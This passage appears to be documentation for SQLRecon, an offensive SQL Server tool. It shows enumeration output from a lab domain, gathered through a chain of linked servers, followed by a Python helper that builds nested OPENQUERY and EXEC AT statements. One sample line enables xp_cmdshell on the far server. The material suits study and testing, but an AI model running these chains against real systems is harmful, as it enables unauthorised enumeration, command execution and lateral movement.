|-> Database: master
|-> Server Version: 16.00.1000
|-> State: Open
|-> Workstation ID: DESKTOP-LF8Q3C6
|-> Packet Size: 8000
|-> Client Connection ID: 5fa6cbbd-1cd3-4f69-be79-c3d489c693e7
|-> Application Name: DESKTOP-LF8Q3C6
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'users' module on MECM01
[VERBOSE] Query:
|-> SELECT name FROM sys.servers WHERE is_linked = 1;
[*] Users in the 'master' database
[VERBOSE] Query:
|-> SELECT * FROM OPENQUERY("SQL02", 'SELECT * FROM OPENQUERY("SQL03", ''SELECT * FROM OPENQUERY("MECM01", ''''SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM sys.database_principals WHERE type NOT IN (''''''''A'''''''', ''''''''R'''''''', ''''''''X'''''''') AND sid IS NOT null AND name NOT LIKE ''''''''##%'''''''' ORDER BY modify_date DESC;'''')'')')
| username | create_date | modify_date | type | authentication_type |
| ------------------- | ------------------- | ------------------- | ------------ | ------------------- |
| NT AUTHORITY\SYSTEM | 6/7/2023 9:32:08 AM | 6/7/2023 9:32:08 AM | WINDOWS_USER | WINDOWS |
| guest | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | NONE |
| dbo | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | INSTANCE |
[*] Server principals
[VERBOSE] Query:
|-> SELECT * FROM OPENQUERY("SQL02", 'SELECT * FROM OPENQUERY("SQL03", ''SELECT * FROM OPENQUERY("MECM01", ''''SELECT name, type_desc, is_disabled, create_date, modify_date FROM sys.server_principals WHERE name NOT LIKE ''''''''##%'''''''' ORDER BY modify_date DESC;'''')'')')
| name | type_desc | is_disabled | create_date | modify_date |
| ---------------------------- | ------------- | ----------- | --------------------- | --------------------- |
| KAWALABS\JSmith | WINDOWS_LOGIN | False | 6/4/2024 11:15:37 AM | 6/4/2024 11:15:37 AM |
| KAWALABS\acon | WINDOWS_LOGIN | False | 6/4/2024 11:15:37 AM | 6/4/2024 11:15:37 AM |
| NT AUTHORITY\NETWORK SERVICE | WINDOWS_LOGIN | False | 6/7/2023 9:58:19 AM | 6/7/2023 9:58:19 AM |
| MECM01\ConfigMgr_DViewAccess | WINDOWS_GROUP | False | 6/7/2023 9:37:35 AM | 6/7/2023 9:37:35 AM |
| NT AUTHORITY\SYSTEM | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/7/2023 9:32:08 AM |
| NT SERVICE\SQLTELEMETRY | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\SQLSERVERAGENT | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| sa | SQL_LOGIN | False | 4/8/2003 9:10:35 AM | 6/6/2023 12:39:59 PM |
| NT SERVICE\MSSQLSERVER | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\Winmgmt | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\SQLWriter | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| KAWALABS\Domain Admins | WINDOWS_GROUP | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| KAWALABS\mssccm_svc | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| public | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
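The nested OPENQUERY that the `/debug` and `/verbose` output above prints for the chain SQL01 -> SQL02 -> SQL03 -> MECM01 is what the chain path described at the top of this section turns into on the wire. The rule is simple: each hop wraps the previous statement in one more T-SQL string literal, so every single quote in the innermost query is doubled once per hop (1, 2, 4, 8 ...). The Python below is an added example written for this page, not SQLRecon's own code. The server names and the `users` query are copied from the page; the `EXEC ('...') AT [server]` builder is an assumption about how you would carry statements that OPENQUERY cannot (it only accepts a statement that returns a result set), and EXEC AT needs `rpc out` enabled on every link in the chain, which is what the `checkrpc` module reports as `is_rpc_out_enabled`.

```python
"""Build nested linked-server statements for a chain of SQL Server links.

Added example for this page; not SQLRecon's code. The OPENQUERY builder
reproduces, byte for byte, the query SQLRecon prints in /debug mode for the
chain SQL01 -> SQL02 -> SQL03 -> MECM01 when running the 'users' module.
"""
from typing import Iterable, List

# Copied from the page: the first query the 'users' module runs.
USERS_QUERY = (
    "SELECT name AS username, create_date, modify_date, type_desc AS type, "
    "authentication_type_desc AS authentication_type FROM sys.database_principals "
    "WHERE type NOT IN ('A', 'R', 'X') AND sid IS NOT null "
    "AND name NOT LIKE '##%' ORDER BY modify_date DESC;"
)

# The hops after the server you connect to (SQL01), in order.
CHAIN: List[str] = ["SQL02", "SQL03", "MECM01"]


def _quote(s: str) -> str:
    """Escape a string for use inside a T-SQL '...' literal: double every quote.

    Every wrapping layer calls this on the whole previous statement, which is
    why a quote that was single in the innermost query shows up as 8 quotes
    after three hops.
    """
    return s.replace("'", "''")


def build_openquery_chain(chain: Iterable[str], query: str) -> str:
    """Nest `query` in OPENQUERY calls so it runs on the last server in `chain`.

    Wrapping starts at the innermost hop, so the outermost OPENQUERY names the
    first link (SQL02) and the server you are connected to (SQL01) evaluates
    it, forwarding the rest of the statement one hop at a time. Each hop runs
    under the login the link maps to (the Remote Login column of 'links').
    """
    stmt = query
    for server in reversed(list(chain)):
        stmt = f"SELECT * FROM OPENQUERY(\"{server}\", '{_quote(stmt)}')"
    return stmt


def build_exec_at_chain(chain: Iterable[str], statement: str) -> str:
    """Nest `statement` in EXEC ('...') AT [server] calls (assumed variant).

    OPENQUERY can only carry a statement that returns rows; configuration
    changes such as sp_configure or xp_cmdshell need EXEC AT, and EXEC AT only
    works when 'rpc out' is enabled on every link along the chain (what the
    checkrpc module reports as is_rpc_out_enabled = True).
    """
    stmt = statement
    for server in reversed(list(chain)):
        stmt = f"EXEC ('{_quote(stmt)}') AT [{server}]"
    return stmt


def quote_depth(chain: Iterable[str]) -> int:
    """Consecutive quotes a literal quote from the innermost query becomes: 2 ** hops."""
    return 2 ** len(list(chain))


if __name__ == "__main__":
    # Constructed sample: the 'users' query through the three-hop chain from the page.
    print(build_openquery_chain(CHAIN, USERS_QUERY))
    print(f"quotes per original quote after {len(CHAIN)} hops: {quote_depth(CHAIN)}")
    # Constructed sample: enable xp_cmdshell on MECM01 via EXEC AT (needs rpc out on each link).
    print(build_exec_at_chain(CHAIN, "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"))
```

Two practical consequences follow from the doubling rule. First, a chain of n hops turns every quote into 2^n quotes, so deep chains hit the 8000-character limit of the OPENQUERY string argument quickly; keep the innermost query short. Second, because each hop is evaluated by the previous server, the identity each layer runs under is decided by that server's link mapping, which is why a `Remote Login` of `sa` on any link hands `sa` to everyone upstream of it.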